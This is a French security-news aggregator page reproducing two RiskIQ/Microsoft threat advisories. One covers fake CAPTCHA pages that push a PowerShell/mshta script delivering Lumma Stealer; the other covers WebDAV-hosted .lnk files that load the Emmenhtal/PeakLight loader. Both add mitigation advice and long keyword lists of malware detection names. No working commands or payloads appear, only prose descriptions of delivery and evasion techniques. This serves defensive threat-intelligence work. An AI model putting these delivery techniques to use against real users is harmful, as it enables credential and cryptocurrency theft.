SOC News: Article

One Article Review

Accueil - L'article:

Source	RiskIQ
Identifiant	8580819
Date de publication	2024-09-20 20:53:14 (vue: 2024-09-20 21:18:12)
Titre	Behind the CAPTCHA: A Clever Gateway of Malware (Recyclage)
Texte	## Snapshot McAfee Labs recently identified a malware campaign leveraging fake CAPTCHA pages to distribute malware, including [Lumma Stealer](https://security.microsoft.com/intel-profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad), a malicious program that targets sensitive information like cryptocurrency wallets and 2FA browser extensions. ## Description The campaign is global, with infections spreading via two main vectors: cracked game download links and phishing emails targeting GitHub users. In one vector, users searching for pirated game software are redirected to malicious CAPTCHA pages, where they are tricked into executing a PowerShell script that installs the malware. In the second vector, phishing emails posing as GitHub security alerts direct users to similar CAPTCHA pages. In both cases, a malicious script is copied to the clipboard and executed via the Windows Run command, bypassing traditional security measures. The script uses multi-layer encryption and mshta utility to obscure its true purpose, downloading and running Lumma Stealer. By storing the malware in the Temp folder, attackers avoid detection, ensuring successful infection and data exfiltration. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email. - Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times. - Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. [Refer to this article](https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=magicti_ta_learndoc) for the different authentication methods and features. - For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled still succeeded due to users clicking “Yes” on the pr
Notes	★★★
Envoyé	Oui
Condensat	© 2024 2024 2147078266 2147117932 2fa 365 365/security/defender 365/security/office about accessed accounts acquired advice: against age alerts all antivirus any app apps are article attachments attack attacker attackers authentication authenticator auto avoid based behind block blocks blogs/mcafee both browser browsers bullet bypassing campaign can captcha captcha: card cases check classes clever click clicking clipboard cloud code com/azure/active com/blogs/other com/deployedge/microsoft com/en com/intel com/microsoft command common components configure content copied copyright cover coverage cracked credential credentials criterion cryptocurrency customers data defender delete delivered deployment description detection detections/hunting detects devices different direct directory/authentication/concept directory/authentication/how directory/identity distribute distribution download downloading due edge email emails employees enable enabled encourage encryption encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforce enhanced ensure ensuring enterprise entire equivalent even evolving example excluded executable executed executing execution exfiltration extensions fakecaptcha features fido files filtering first folder following from game gateway github global group guidance hello host hour https://learn https://security https://www identified identity impact inbound including infection infections information infostealer infostealers installs intelligence intrusions its keys labs labs/behind layer learndoc learndoc#block learning leveraging like links list locations lumma machine mail main majority malicious malware malware/ malware: managed many match mcafee measures meet methods mfa microsoft mitigation mitigations mode monitored more mshta msr&threatid= mtb mtb&threatid= multi name=pws:win32/lumma name=trojan:msil/vidar name=trojan:win32/lummacstealer name=trojan:win32/lummastealer name=trojan:win32/phonzy new newly not number obfuscated obscure ocid=magicti off offer office one organizations other overview pages part password passwordless passwords permission personal phishing phones pirated points policies policy polymorphic posing possible potentially powershell prevalence prevent product profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad program prohibited prompt protection protection/howto protections pua purge purpose pws:win32/lumma queries ransomware rapidly recently recheck recommendations recommends redirected reduce reduction refer reference references remind remove reproduction require requires reserved response rights rules run running safe scam script scripts searching second secured security security/defender security/safe security/zero sensitive sent settings should sight similar site sites smartscreen snapshot software spam specific spoofed spreading status stealer stop stored storing strictly succeeded successful support surface sweeping sync#sync syncing targeting targets techniques temp theft thereof threat threats times tools traditional tricked trojan:msil/vidar trojan:win32/lummacstealer trojan:win32/lummastealer trojan:win32/phonzy true trusted turn two typed unknown unless unwanted us/wdsi/threats/malware use used users uses using utility variants vaults vector vectors: wallets web websites when where whichidentifies windows without workplace written your “yes”
Tags	Ransomware Spam Malware Tool Threat
Stories
Move

Les reprises de l'article (1):

Source	RiskIQ
Identifiant	8580783
Date de publication	2024-09-20 19:42:19 (vue: 2024-09-20 20:18:10)
Titre	WEBDAV MALICIET Fichier Hébergement alimentaire des attaques de logiciels malveillants furtifs Webdav Malicious File Hosting Powering Stealthy Malware Attacks (Recyclage)
Texte	## Snapshot A new method of attack has emerged that leverages WebDAV technology to host malicious files. This technique, which aids in the distribution of the Emmenthal loader, also known as PeakLight, has been under investigation since December 2023. ## Description The Sekoia TDR team identified over 100 malicious WebDAV servers involved in distributing the Emmenhtal loader. These servers host weaponized “.lnk” files designed to download further malicious payloads using “mshta.exe,” a legitimate executable. The diversity of malware payloads suggests that this WebDAV infrastructure may be part of a more extensive cybercriminal operation offering IaaS to multiple threat actors. The Emmenhtal loader, also known as PeakLight, is notorious for its stealthy, memory-only execution and its role in distributing various infostealers worldwide. The wide range of malware indicates that multiple threat actors utilize the same service. The repeated use of specific AS providers over several months points to a centralized service offering. The infrastructure supporting the Emmenhtal loader represents a sophisticated operation likely offered as a service to various cybercriminals. Its ability to deliver multiple malware payloads while maintaining stealth underscores the evolving threat landscape in cybersecurity. ## Microsoft Analysis The memory-only dropper named [PeakLight](https://security.microsoft.com/intel-explorer/articles/a1d5fe95), which uses ZIP files disguised as pirated movies to deploy a PowerShell-based downloader. This fileless malware, challenging to detect due to its operation within trusted applications like PowerShell, allows attackers to execute malicious activities discreetly, maintaining persistence and evading most security defenses. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of Information Stealer threats. - Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use[Microsoft Defender for Office 365](https://learn.microsoft.com/en-us/defender-office-365/mdo-about?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/en-us/defender-office-365/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/en-us/defender-office-365/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/en-us/defender-office-365/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email. - Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/en-us/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times. - Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. [Refer to this article](https://learn.m
Notes	★★★
Envoyé	Oui
Condensat	### © 100 2023 2024 2024 365 365/mdo 365/safe 365/zero ability about accessed accounts acquired activities actors advice: against age aids all allows also analysis antivirus any app applications apps are article attachments attack attacker attackers attacks attacks/ authentication authenticator auto backdoor:js/remcos backdoor:msil/asyncrat backdoor:msil/remcos backdoor:win32/asyncrat backdoor:win32/remcos based been block blocks browser browsers bullet can centralized challenging check classes click clicking cloud code com/en com/intel com/webdav common components configure content copyright cover coverage credential credentials criterion customers cybercriminal cybercriminals cybersecurity december decoding defender defenses delete deliver delivered deploy description designed detect detects devices different discreetly disguised distributing distribution diversity download downloader dropper due edge email emails emerged emmenhtal emmenthal employees enable enabled encourage encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforce enhanced ensure enterprise entire equivalent evading even evolving example excluded exe executable execute execution explorer/articles/a1d5fe95 extensive features fido file fileless files filtering first following from further gbhackers group guidance has hello host hosting hour https://gbhackers https://learn https://security https://www iaas identified identifies identity impact inbound including indicates infections information infostealer infostealers infrastructure intelligence intrusions investigation involved its keys known landscape learndoc learndoc#block learning legitimate leverages like likely links list lnk” loader locations machine mail maintaining majority malicious malware malware: managed many match may meet memory method methods mfa microsoft mitigation mitigations mode months more most movies msr multiple name=backdoor:js/remcos name=backdoor:msil/asyncrat name=backdoor:win32/asyncrat name=backdoor:win32/remcos name=pws:win32/remcos name=trojan:msil/asyncrat name=trojan:vba/asyncrat name=trojan:vbs/asyncrat name=trojan:vbs/danabot name=trojan:vbs/xworm name=trojan:win32/cryptbot name=trojan:win32/danabot name=trojan:win32/darkgate name=trojan:win32/lummastealer name=trojan:win32/remcos name=trojan:win64/amadey name=trojan:win64/danabot name=trojan:xml/asyncrat name=trojandownloader:autoit/remcos name=trojandownloader:msil/asyncrat name=trojandownloader:o97m/remcos name=trojandownloader:vbs/asyncrat name=trojandownloader:vbs/danabot name=trojandownloader:win32/danabot name=trojandropper:win32/cryptbot name=trojanspy:win32/danabot name=trojanspy:win64/danabot named new newly not notorious number obfuscated ocid=magicti off offer offered offering office only operation organizations other over overview part password passwordless passwords payloads peaklight peaklight: permission persistence personal phishing phones pirated points policies policy polymorphic possible potentially powering powershell prevalence prevent product profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6 prohibited prompt protection protection/howto protections providers pua purge pws:win32/remcos query=remcos range ransomware rapidly recheck recommendations recommends reduce reduction refer reference references remind remove repeated represents reproduction require requires reserved response rights role rules running safe same scam scripts search secured security sekoia sent servers service settings several should sight since site sites smartscreen snapshot sophisticated spam specific spoofed stealer stealers stealth stealthy stop stored strictly succeeded suggests support supporting surface sweeping sync#sync syncing tdr team technique techniques technology theft thereof these threat threats times tools trojan:msil/asyncrat trojan:vba/asyncrat trojan:vbs/asyncrat trojan:vbs/danabot trojan:vbs/xworm trojan:win32/cryptbot trojan:win32/danabot trojan:win32/darkgate trojan:win32/lummastealer trojan:win32/remcos trojan:win64/amadey trojan:win64/da
Tags	Ransomware Spam Malware Tool Threat
Stories
Move

L'article ne semble pas avoir été repris sur un précédent.